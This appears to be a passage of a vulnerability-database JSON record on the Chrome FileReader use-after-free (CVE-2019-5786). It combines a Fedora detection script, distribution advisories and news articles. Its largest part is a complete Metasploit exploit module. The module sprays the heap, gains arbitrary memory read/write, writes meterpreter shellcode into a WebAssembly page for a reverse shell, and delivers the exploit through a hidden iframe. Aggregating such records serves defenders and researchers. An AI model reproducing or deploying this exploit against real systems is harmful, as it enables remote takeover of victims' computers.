"CVE-2019-5782", "CVE-2019-5801", "CVE-2019-5779", "CVE-2019-5756", "CVE-2019-5793", "CVE-2019-5770", "CVE-2019-5778", "CVE-2019-5804", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5795", "CVE-2019-5786", "CVE-2019-5799", "CVE-2019-5775", "CVE-2019-5773", "CVE-2019-5796", "CVE-2019-5780", "CVE-2019-5791", "CVE-2019-5784", "CVE-2019-5765", "CVE-2019-5781", "CVE-2019-5759", "CVE-2019-5790", "CVE-2019-5760", "CVE-2019-5794", "CVE-2019-5800", "CVE-2019-5788", "CVE-2019-5787", "CVE-2019-5774"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310875626", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875626", "type": "openvas", "title": "Fedora Update for chromium FEDORA-2019-561eae4626", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875626\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-5754\", \"CVE-2019-5782\", \"CVE-2019-5755\", \"CVE-2019-5756\", \"CVE-2019-5757\", \"CVE-2019-5758\", \"CVE-2019-5759\", \"CVE-2019-5760\", \"CVE-2019-5761\", \"CVE-2019-5762\", \"CVE-2019-5763\", \"CVE-2019-5764\", \"CVE-2019-5765\", \"CVE-2019-5766\", \"CVE-2019-5767\", \"CVE-2019-5768\", \"CVE-2019-5769\", \"CVE-2019-5770\", \"CVE-2019-5771\", \"CVE-2019-5772\", \"CVE-2019-5773\", \"CVE-2019-5774\", \"CVE-2019-5775\", \"CVE-2019-5776\", \"CVE-2019-5777\", \"CVE-2019-5778\", \"CVE-2019-5779\", \"CVE-2019-5780\", \"CVE-2019-5781\", \"CVE-2019-5784\", \"CVE-2019-5786\", \"CVE-2019-5787\", \"CVE-2019-5788\", \"CVE-2019-5789\", \"CVE-2019-5790\", \"CVE-2019-5791\", \"CVE-2019-5792\", \"CVE-2019-5793\", \"CVE-2019-5794\", \"CVE-2019-5795\", \"CVE-2019-5796\", \"CVE-2019-5797\", \"CVE-2019-5798\", \"CVE-2019-5799\", \"CVE-2019-5800\", \"CVE-2019-5802\", \"CVE-2019-5803\", \"CVE-2019-5804\", \"CVE-2019-5801\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:12:35 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for chromium FEDORA-2019-561eae4626\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-561eae4626\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZQOP53LXXPRGD4N5OBKGQTSMFXT32LF6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the FEDORA-2019-561eae4626 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium is an open-source web browser, powered by WebKit (Blink).\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~73.0.3683.75~2.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2019-05-08T20:20:52", "description": "", "published": "2019-05-08T00:00:00", "type": "exploitdb", "title": "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5786"], "modified": "2019-05-08T00:00:00", "id": "EDB-ID:46812", "href": "https://www.exploit-db.com/exploits/46812", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86',\r\n 'Description' => %q{\r\n This exploit takes advantage of a use after free vulnerability in Google\r\n Chrome 72.0.3626.119 running on Windows 7 x86.\r\n The FileReader.readAsArrayBuffer function can return multiple references to the\r\n same ArrayBuffer object, which can be freed and overwritten with sprayed objects.\r\n The dangling ArrayBuffer reference can be used to access the sprayed objects,\r\n allowing arbitrary memory access from Javascript. This is used to write and\r\n execute shellcode in a WebAssembly object.\r\n The shellcode is executed within the Chrome sandbox, so you must explicitly\r\n disable the sandbox for the payload to be successful.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Clement Lecigne', # discovery\r\n 'Istv\u00e1n Kurucsai', # Exodus Intel\r\n 'timwr', # metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2019-5786'],\r\n ['URL', 'https://github.com/exodusintel/CVE-2019-5786'],\r\n ['URL', 'https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/'],\r\n ['URL', 'https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analysis-of-a-chrome-zero-day-cve-2019-5786/'],\r\n ['URL', 'https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html'],\r\n ],\r\n 'Arch' => [ ARCH_X86 ],\r\n 'Platform' => 'windows',\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },\r\n 'Targets' => [ [ 'Automatic', { } ] ],\r\n 'DisclosureDate' => 'Mar 21 2019'))\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n print_status(\"Sending #{request.uri}\")\r\n if request.uri =~ %r{/exploit.html$}\r\n html = %Q^\r\n<html>\r\n <head>\r\n <script>\r\nlet myWorker = new Worker('worker.js');\r\nlet reader = null;\r\nspray = null; // nested arrays used to hold the sprayed heap contents\r\nlet onprogress_cnt = 0; // number of times onprogress was called in a round\r\nlet try_cnt = 0; // number of rounds we tried\r\nlet last = 0, lastlast = 0; // last two AB results from the read\r\nlet tarray = 0; // TypedArray constructed from the dangling ArrayBuffer\r\nconst string_size = 128 * 1024 * 1024;\r\nlet contents = String.prototype.repeat.call('Z', string_size);\r\nlet f = new File([contents], \"text.txt\");\r\nconst marker1 = 0x36313233;\r\nconst marker2 = 0x37414546;\r\n\r\nconst outers = 256;\r\nconst inners = 1024;\r\n\r\nfunction allocate_spray_holders() {\r\n spray = new Array(outers);\r\n for (let i = 0; i < outers; i++) {\r\n spray[i] = new Array(inners);\r\n }\r\n}\r\n\r\nfunction clear_spray() {\r\n for (let i = 0; i < outers; i++) {\r\n for (let j = 0; j < inners; j++) {\r\n spray[i][j] = null;\r\n }\r\n }\r\n}\r\n\r\nfunction reclaim_mixed() {\r\n // spray the heap to reclaim the freed region\r\n let tmp = {};\r\n for (let i = 0; i < outers; i++) {\r\n for (let j = 0; j + 2 < inners; j+=3) {\r\n spray[i][j] = {a: marker1, b: marker2, c: tmp};\r\n spray[i][j].c = spray[i][j] // self-reference to find our absolute address\r\n spray[i][j+1] = new Array(8);\r\n spray[i][j+2] = new Uint32Array(32);\r\n }\r\n }\r\n}\r\n\r\nfunction find_pattern() {\r\n const start_offset = 0x00afc000 / 4;\r\n for (let i = start_offset; i + 1 < string_size / 4; i++) {\r\n if (i < 50){\r\n console.log(tarray[i].toString(16));\r\n }\r\n // multiply by two because of the way SMIs are stored\r\n if (tarray[i] == marker1 * 2) {\r\n if (tarray[i+1] == marker2 * 2) {\r\n console.log(`found possible candidate objectat idx ${i}`);\r\n return i;\r\n }\r\n }\r\n }\r\n return null;\r\n}\r\n\r\n\r\nfunction get_obj_idx(prop_idx) {\r\n // find the index of the Object in the spray array\r\n tarray[prop_idx] = 0x62626262;\r\n for (let i = 0; i < outers; i++) {\r\n for (let j = 0; j < inners; j+=1) {\r\n try {\r\n if (spray[i][j].a == 0x31313131) {\r\n console.log(`found object idx in the spray array: ${i} ${j}`);\r\n return spray[i][j];\r\n }\r\n } catch (e) {}\r\n }\r\n }\r\n}\r\n\r\nfunction ta_read(addr) {\r\n // reads an absolute address through the original freed region\r\n // only works for ta_absolute_addr + string_size (128MiB)\r\n if (addr > ta_absolute_addr && addr < ta_absolute_addr + string_size) {\r\n return tarray[(addr-ta_absolute_addr)/4];\r\n }\r\n\r\n return 0;\r\n}\r\n\r\nfunction ta_write(addr, value) {\r\n // wrtie to an absolute address through the original freed region\r\n // only works for ta_absolute_addr + string_size (128MiB)\r\n if (addr % 4 || value > 2**32 - 1 ||\r\n addr < ta_absolute_addr ||\r\n addr > ta_absolute_addr + string_size) {\r\n console.log(`invalid args passed to ta_write(${addr.toString(16)}, ${value}`);\r\n }\r\n tarray[(addr-ta_absolute_addr)/4] = value;\r\n}\r\n\r\nfunction get_corruptable_ui32a() {\r\n // finds a sprayed Uint32Array, the elements pointer of which also falls into the controlled region\r\n for (let i = 0; i < outers; i++) {\r\n for (let j = 0; j + 2 < inners; j+=3) {\r\n let ui32a_addr = addrof(spray[i][j+2]) - 1;\r\n let bs_addr = ta_read(ui32a_addr + 12) - 1;\r\n let elements_addr = ta_read(ui32a_addr + 8) - 1;\r\n // read its elements pointer\r\n // if the elements ptr lies inside the region we have access to\r\n if (bs_addr >= ta_absolute_addr && bs_addr < ta_absolute_addr + string_size &&\r\n elements_addr >= ta_absolute_addr && elements_addr < ta_absolute_addr + string_size) {\r\n console.log(`found corruptable Uint32Array->elements at ${bs_addr.toString(16)}, on Uint32Array idx ${i} ${j}`);\r\n return {\r\n bs_addr: bs_addr,\r\n elements_addr: elements_addr,\r\n ui32: spray[i][j+2],\r\n i: i, j: j\r\n }\r\n }\r\n }\r\n }\r\n}\r\n\r\nvar reader_obj = null;\r\nvar object_prop_taidx = null;\r\nvar ta_absolute_addr = null;\r\nvar aarw_ui32 = null;\r\n\r\nfunction addrof(leaked_obj) {\r\n reader_obj.a = leaked_obj;\r\n return tarray[object_prop_taidx];\r\n}\r\n\r\n\r\nfunction read4(addr) {\r\n // save the old values\r\n let tmp1 = ta_read(aarw_ui32.elements_addr + 12);\r\n let tmp2 = ta_read(aarw_ui32.bs_addr + 16);\r\n\r\n // rewrite the backing store ptr\r\n ta_write(aarw_ui32.elements_addr + 12, addr);\r\n ta_write(aarw_ui32.bs_addr + 16, addr);\r\n\r\n let val = aarw_ui32.ui32[0];\r\n\r\n ta_write(aarw_ui32.elements_addr + 12, tmp1);\r\n ta_write(aarw_ui32.bs_addr + 16, tmp2);\r\n\r\n return val;\r\n}\r\n\r\nfunction write4(addr, val) {\r\n // save the old values\r\n let tmp1 = ta_read(aarw_ui32.elements_addr + 12);\r\n let tmp2 = ta_read(aarw_ui32.bs_addr + 16);\r\n\r\n // rewrite the backing store ptr\r\n ta_write(aarw_ui32.elements_addr + 12, addr);\r\n ta_write(aarw_ui32.bs_addr + 16, addr);\r\n\r\n aarw_ui32.ui32[0] = val;\r\n\r\n ta_write(aarw_ui32.elements_addr + 12, tmp1);\r\n ta_write(aarw_ui32.bs_addr + 16, tmp2);\r\n}\r\n\r\nfunction get_rw() {\r\n // free up as much memory as possible\r\n // spray = null;\r\n // contents = null;\r\n force_gc();\r\n\r\n // attepmt reclaiming the memory pointed to by dangling pointer\r\n reclaim_mixed();\r\n\r\n // access the reclaimed region as a Uint32Array\r\n tarray = new Uint32Array(lastlast);\r\n object_prop_taidx = find_pattern();\r\n if (object_prop_taidx === null) {\r\n console.log('ERROR> failed to find marker');\r\n window.top.postMessage(`ERROR> failed to find marker`, '*');\r\n return;\r\n }\r\n\r\n // leak the absolute address of the Object\r\n const obj_absolute_addr = tarray[object_prop_taidx + 2] - 1; // the third property of the sprayed Object is self-referential\r\n ta_absolute_addr = obj_absolute_addr - (object_prop_taidx-3)*4\r\n console.log(`leaked absolute address of our object ${obj_absolute_addr.toString(16)}`);\r\n console.log(`leaked absolute address of ta ${ta_absolute_addr.toString(16)}`);\r\n\r\n reader_obj = get_obj_idx(object_prop_taidx);\r\n if (reader_obj == undefined) {\r\n console.log(`ERROR> failed to find object`);\r\n window.top.postMessage(`ERROR> failed to find object`, '*');\r\n return;\r\n }\r\n // now reader_obj is a reference to the Object, object_prop_taidx is the index of its first inline property from the beginning of tarray\r\n\r\n console.log(`addrof(reader_obj) == ${addrof(reader_obj)}`);\r\n aarw_ui32 = get_corruptable_ui32a();\r\n // arbitrary read write up after this point\r\n}\r\n\r\nvar wfunc = null;\r\nlet meterpreter = unescape(\"#{Rex::Text.to_unescape(payload.encoded)}\");\r\n\r\nfunction rce() {\r\n function get_wasm_func() {\r\n var importObject = {\r\n imports: { imported_func: arg => console.log(arg) }\r\n };\r\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\r\n wasm_code = new Uint8Array(bc);\r\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\r\n return wasm_mod.exports.exported_func;\r\n }\r\n\r\n let wasm_func = get_wasm_func();\r\n wfunc = wasm_func;\r\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\r\n let wasm_func_addr = addrof(wasm_func) - 1;\r\n let sfi = read4(wasm_func_addr + 12) - 1;\r\n let WasmExportedFunctionData = read4(sfi + 4) - 1;\r\n let instance = read4(WasmExportedFunctionData + 8) - 1;\r\n let rwx_addr = read4(instance + 0x74);\r\n\r\n // write the shellcode to the RWX page\r\n if (meterpreter.length % 2 != 0)\r\n meterpreter += \"\\\\u9090\";\r\n\r\n for (let i = 0; i < meterpreter.length; i += 2) {\r\n write4(rwx_addr + i*2, meterpreter.charCodeAt(i) + meterpreter.charCodeAt(i + 1) * 0x10000);\r\n }\r\n\r\n // if we got to this point, the exploit was successful\r\n window.top.postMessage('SUCCESS', '*');\r\n console.log('success');\r\n wfunc();\r\n\r\n // invoke the shellcode\r\n //window.setTimeout(wfunc, 1000);\r\n}\r\n\r\nfunction force_gc() {\r\n // forces a garbage collection to avoid OOM kills\r\n try {\r\n var failure = new WebAssembly.Memory({initial: 32767});\r\n } catch(e) {\r\n // console.log(e.message);\r\n }\r\n}\r\n\r\nfunction init() {\r\n abs = [];\r\n tarray = 0;\r\n onprogress_cnt = 0;\r\n try_cnt = 0;\r\n last = 0, lastlast = 0;\r\n reader = new FileReader();\r\n\r\n reader.onloadend = function(evt) {\r\n try_cnt += 1;\r\n failure = false;\r\n if (onprogress_cnt < 2) {\r\n console.log(`less than 2 onprogress events triggered: ${onprogress_cnt}, try again`);\r\n failure = true;\r\n }\r\n\r\n if (lastlast.byteLength != f.size) {\r\n console.log(`lastlast has a different size than expected: ${lastlast.byteLength}`);\r\n failure = true;\r\n }\r\n\r\n if (failure === true) {\r\n console.log('retrying in 1 second');\r\n window.setTimeout(exploit, 1);\r\n return;\r\n }\r\n\r\n console.log(`onloadend attempt ${try_cnt} after ${onprogress_cnt} onprogress callbacks`);\r\n try {\r\n // trigger the FREE\r\n myWorker.postMessage([last], [last, lastlast]);\r\n } catch(e) {\r\n // an exception with this message indicates that the FREE part of the exploit was successful\r\n if (e.message.includes('ArrayBuffer at index 1 could not be transferred')) {\r\n get_rw();\r\n rce();\r\n return;\r\n } else {\r\n console.log(e.message);\r\n }\r\n }\r\n }\r\n reader.onprogress = function(evt) {\r\n force_gc();\r\n let res = evt.target.result;\r\n // console.log(`onprogress ${onprogress_cnt}`);\r\n onprogress_cnt += 1;\r\n if (res.byteLength != f.size) {\r\n // console.log(`result has a different size than expected: ${res.byteLength}`);\r\n return;\r\n }\r\n lastlast = last;\r\n last = res;\r\n }\r\n if (spray === null) {\r\n // allocate the spray holders if needed\r\n allocate_spray_holders();\r\n }\r\n\r\n // clear the spray holder arrays\r\n clear_spray();\r\n\r\n // get rid of the reserved ArrayBuffer range, as it may interfere with the exploit\r\n try {\r\n let failure = new ArrayBuffer(1024 * 1024 * 1024);\r\n } catch (e) {\r\n console.log(e.message);\r\n }\r\n\r\n force_gc();\r\n}\r\n\r\nfunction exploit() {\r\n init();\r\n reader.readAsArrayBuffer(f);\r\n console.log(`attempt ${try_cnt} started`);\r\n}\r\n </script>\r\n </head>\r\n <body onload=\"exploit()\">\r\n </body>\r\n</html>\r\n ^\r\n send_response(cli, html)\r\n elsif request.uri =~ %r{/worker.js$}\r\n send_response(cli, 'onmessage = function (msg) { }')\r\n else\r\n uripath = datastore['URIPATH'] || get_resource\r\n uripath += '/' unless uripath.end_with? '/'\r\n html = %Q^\r\n<html>\r\n <head>\r\n <script>\r\n function iter() {\r\n let iframe = null;\r\n try {\r\n iframe = document.getElementById('myframe');\r\n document.body.removeChild(iframe);\r\n } catch (e) {}\r\n\r\n iframe = document.createElement('iframe');\r\n iframe.src = '#{uripath}exploit.html';\r\n iframe.id = 'myframe';\r\n iframe.style = \"width:0; height:0; border:0; border:none; visibility=hidden\"\r\n document.body.appendChild(iframe);\r\n console.log(document.getElementById('myframe'));\r\n }\r\n\r\n function brute() {\r\n window.setTimeout(iter, 1000);\r\n let interval = window.setInterval(iter, 15000);\r\n\r\n window.onmessage = function(e) {\r\n if (e.data.includes('SUCCESS')) {\r\n console.log('exploit successful!');\r\n window.clearInterval(interval);\r\n }\r\n console.log(e);\r\n }\r\n }\r\n </script>\r\n </head>\r\n <body onload=\"brute()\"></body>\r\n</html>\r\n ^\r\n send_response(cli, html)\r\n end\r\n end\r\n\r\nend", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46812"}], "archlinux": [{"lastseen": "2020-09-22T18:36:40", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5786"], "description": "Arch Linux Security Advisory ASA-201903-1\n=========================================\n\nSeverity: High\nDate : 2019-03-02\nCVE-ID : CVE-2019-5786\nPackage : chromium\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-916\n\nSummary\n=======\n\nThe package chromium before version 72.0.3626.121-1 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 72.0.3626.121-1.\n\n# pacman -Syu \"chromium>=72.0.3626.121-1\"\n\nThe problem has been fixed upstream in version 72.0.3626.121.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA use-after-free issue has been found in the FileReader component of\nthe chromium browser before 72.0.3626.121.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code via a crafted file.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=936448\nhttps://security.archlinux.org/CVE-2019-5786", "modified": "2019-03-02T00:00:00", "published": "2019-03-02T00:00:00", "id": "ASA-201903-1", "href": "https://security.archlinux.org/ASA-201903-1", "type": "archlinux", "title": "[ASA-201903-1] chromium: arbitrary code execution", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "thn": [{"lastseen": "2019-03-06T10:29:16", "bulletinFamily": "info", "cvelist": ["CVE-2019-5786"], "description": "[](<https://1.bp.blogspot.com/-hYeL9HSrkr8/XH-YRFnQiNI/AAAAAAAAzdU/qJcBEPSf6D0nh6oxWhcwvfROeWNxLorjgCLcBGAs/s728-e100/chrome.png>)\n\nYou must update your Google Chrome immediately to the latest version of the web browsing application. \n \nSecurity researcher **Clement Lecigne** of Google's Threat Analysis Group discovered and reported a high severity vulnerability in Chrome late last month that could allow remote attackers to execute arbitrary code and take full control of the computers. \n \nThe vulnerability, assigned as [CVE-2019-5786](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5786>), affects the web browsing software for all major operating systems including Microsoft Windows, Apple macOS, and Linux. \n\n\n \nWithout revealing technical details of the vulnerability, the Chrome security team only says the issue is a use-after-free vulnerability in the FileReader component of the Chrome browser, which leads to remote code execution attacks. \n \nWhat's more worrisome? Google warned that this zero-day RCE vulnerability is actively being exploited in the wild by attackers to target Chrome users. \n \n\n\n> \"Access to bug details and links may be [kept restricted](<https://bugs.chromium.org/p/chromium/issues/detail?id=936448>) until a majority of users are updated with a fix,\" the Chrome security team [notes](<https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html>). \"We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed.\"\n\n \nFileReader is a standard API that has been designed to allow web applications to asynchronously read the contents of files (or raw data buffers) stored on a user's computer, using 'File' or 'Blob' objects to specify the file or data to read. \n\n\n[](<https://1.bp.blogspot.com/-cDw0oW1O2XA/XH-UbocY50I/AAAAAAAAzdI/P271YPGjVvgMLh_q1IL4Eds2-dpp86SQACLcBGAs/s728-e100/update-download-google-chrome.png>)\n\nThe use-after-free vulnerability is a class of memory corruption bug that allows corruption or modification of data in memory, enabling an unprivileged user to escalate privileges on an affected system or software. \n\n\n \nThe use-after-free vulnerability in the FileReader component could enable unprivileged attackers to gain privileges on the Chrome web browser, allowing them to escape sandbox protections and run arbitrary code on the targeted system. \n \nIt appears to exploit this vulnerability, all an attacker needs to do is tricking victims into just opening, or redirecting them to, a specially-crafted webpage without requiring any further interaction. \n \nThe patch for the security vulnerability has already been rolled out to its users in a stable **Chrome update 72.0.3626.121** for Windows, Mac, and Linux operating systems, which users may have already receive or will soon receive in coming days. \n \nSo, make sure your system is running the updated version of the Chrome web browser. \n \nWe will update the article, as soon as Google releases technical details of this vulnerability.\n", "modified": "2019-03-06T09:52:57", "published": "2019-03-06T09:52:00", "id": "THN:9B9CD91CB050B48FE5802D55125DA161", "href": "https://thehackernews.com/2019/03/update-google-chrome-hack.html", "type": "thn", "title": "New Google Chrome Zero-Day Vulnerability Found Actively Exploited in the Wild", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-03-29T17:36:36", "bulletinFamily": "info", "cvelist": ["CVE-2019-0797", "CVE-2019-0808", "CVE-2019-5786"], "description": "[](<https://1.bp.blogspot.com/-PKdiogHzFeI/XIf0vqexEZI/AAAAAAAAzfs/p4e6mA-R0002aWC4T5QjStHpVJq7nTecACLcBGAs/s728-e100/microsoft-windows-security-updates.jpg>)\n\nIt's time for another batch of \"Patch Tuesday\" updates from Microsoft. \n \nMicrosoft today released its [March 2019 software updates](<https://portal.msrc.microsoft.com/en-us/security-guidance>) to address a total of 64 CVE-listed security vulnerabilities in its Windows operating systems and other products, 17 of which are rated critical, 45 important, one moderate and one low in severity. \n \nThe update addresses flaws in Windows, Internet Explorer, Edge, MS Office, and MS Office SharePoint, ChakraCore, Skype for Business, and Visual Studio NuGet. \n \nFour of the security vulnerabilities, all rated important, patched by the tech giant this month were disclosed publicly, of which none were found exploited in the wild. \n \n\n\n## Microsoft Patches Two Zero-Day Flaws Under Active Attack\n\n \nMicrosoft has also patched two separate zero-day elevation of privilege vulnerabilities in Windows. \n\n\n \nBoth flaws, also rated as important, reside in Win32k component that hackers are actively exploiting in the wild, including the one that Google warned of last week. \n \nIf you are unaware, Google last week released a [critical update for Chrome](<https://thehackernews.com/2019/03/update-google-chrome-hack.html>) web browser to address a high-severity flaw (CVE-2019-5786) that attackers found exploiting in combination with a Windows vulnerability ([CVE-2019-0808](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808>)). \n \nSuccessful exploitation of both flaws together allowed remote attackers to execute arbitrary code on targeted computers running Windows 7 or Server 2008 and take full control of them. \n \nThe second zero-day elevation of privilege vulnerability in Windows, assigned as [CVE-2019-0797](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0797>), that's also being exploited in the wild is similar to the first one but affects Windows 10, 8.1, Server 2012, 2016, and 2019. \n \nThis flaw was detected and reported to Microsoft by security researchers Vasily Berdnikov and Boris Larin of Kaspersky Labs, who in a [blog post](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) today revealed that the flaw has actively been exploited in targeted attacks by several threat actors including, FruityArmor and SandCat. \n\n\n> \"CVE-2019-0797 is a race condition that is present in the win32k driver due to a lack of proper synchronization between undocumented syscalls NtDCompositionDiscardFrame and NtDCompositionDestroyConnection,\" the researchers say.\n\n \n\n\n## Update Also Patches 17 Critical and 45 Important Flaws\n\n \nAs expected, almost all of the listed critical-rated vulnerabilities lead to remote code execution attacks and primarily impact various versions of Windows 10 and Server editions. Most of these flaws reside in Chakra Scripting Engine, VBScript Engine, DHCP Client, and IE. \n \nWhile some of the important-rated vulnerabilities also lead to remote code execution attacks, others allow elevation of privilege, information disclosure, and denial of service attacks. \n\n\n \nUsers and system administrators are strongly recommended to apply the latest security patches as soon as possible to keep hackers and cybercriminals away from taking control of their systems. \n \nFor installing the latest security patch updates, head on to Settings \u2192 Update & Security \u2192 Windows Update \u2192 Check for updates, on your computer system or you can install the updates manually. \n \n\n\n#### Windows 10 Now Automatically Uninstalls Updates That Cause Problems\n\n \nFor addressing problematic update issues on Windows 10 devices, Microsoft on Monday introduced a safety measure that [automatically uninstalls buggy software](<https://thehackernews.com/2019/03/windows-buggy-updates.html>) updates installed on your system if your operating system detects a startup failure. \n \nSo after installing this month\u2019s security update, if you receive the following notification on your device, your Windows 10 computer has been recovered from a startup failure, and the operating system resolved the failure by uninstalling recently installed Windows updates. \n\n\n> \"We removed some recently installed updates to recover your device from a startup failure.\"\n\nWindows 10 will then automatically block installation of that problematic updates for the next 30 days, and will deliver the update again after investigating and fixing the issue. \n \nAdobe also rolled out security updates today to fix just two critical arbitrary code execution [vulnerabilities in Adobe Photoshop CC](<https://thehackernews.com/2019/03/adobe-software-updates.html>) and another in Adobe Digital Editions. Users of the affected Adobe software for Windows and macOS are advised to update their software packages to the latest versions. \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "modified": "2019-03-29T17:27:27", "published": "2019-03-12T18:15:00", "id": "THN:04C2B4D392A1C67EF52FAF0D2CFA9E55", "href": "https://thehackernews.com/2019/03/microsoft-windows-security-updates.html", "type": "thn", "title": "Microsoft Releases Patches for 64 Flaws \u2014 Two Under Active Attack", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2019-03-08T03:54:54", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5786"], "description": "This update for chromium fixes the following issues:\n\n Chromium was updated: to 72.0.3626.121:\n\n * CVE-2019-5786: Use-after-free in FileReader fixed (boo#1127602)\n * Feature fixes update only\n\n", "edition": 1, "modified": "2019-03-08T00:09:19", "published": "2019-03-08T00:09:19", "id": "OPENSUSE-SU-2019:0298-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00010.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2020-09-02T11:42:47", "bulletinFamily": "info", "cvelist": ["CVE-2019-5786"], "description": "### *Detect date*:\n03/01/2019\n\n### *Severity*:\nHigh\n\n### *Description*:\nUse-after-free vulnerability was found in FileReader component of Google Chrome. Malicious users can exploit this vulnerability to execute arbitrary 